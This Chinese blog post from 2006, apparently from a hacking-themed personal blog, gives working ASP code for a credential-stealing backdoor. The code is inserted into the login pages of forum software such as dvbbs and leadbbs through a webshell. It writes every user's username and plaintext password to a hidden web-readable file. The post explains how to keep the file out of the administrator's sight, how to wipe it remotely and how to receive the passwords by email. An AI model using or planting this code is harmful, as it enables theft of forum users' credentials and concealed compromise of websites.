注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

网路游侠

www.youxia.org

 
 
 

日志

 
 

用asp记录论坛用户密码(dvbbs,leadbbs等)  

2006-01-08 16:44:01|  分类: 07 黑客安全 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
很多人在得到动网的数据库后郁闷不已
(呀的,管理员的变态密码让我们的机器跑砸了都没辙)
Now We Have Another Method!!!!!
这就是用asp记录明文密码。


用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。
2.将PATH换成web下可访问的路径,如:C:/Inetpub/wwwroot/.../Info.txt(info.txt的路径越深越好,防止admin发现)
3.你的webshell必须有权限修改文件且FileSystemObject可用。
4.一段时间后在IE上访问:http://.../Info.txt就 可以看到登录过的用户的帐号密码。
5.在IE上输http://.../(whichyourmodified).asp?u=del 可一清楚info.txt的内容。

注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。
2.为了防止info.txt过大,我用清空info.txt的方法。
当然你可以新建文件来解决此问题。
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if
--------------------------------------------------------------------
<%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("Scripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile(PATH,2,True)
file.WriteLine ""
End If
If fso.FileExists("PATH") Then
set file=fso.OpenTextFile(PATH,8,True)
Else
set file=fso.CreateTextFile(PATH)
end if
file.WriteLine "Username:"+Request.form("Username")
file.WriteLine "Password:"+Request.form("password")
file.close
set file3=fso.GetFile(PATH)
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if

set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%>

  评论这张
 
阅读(205)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017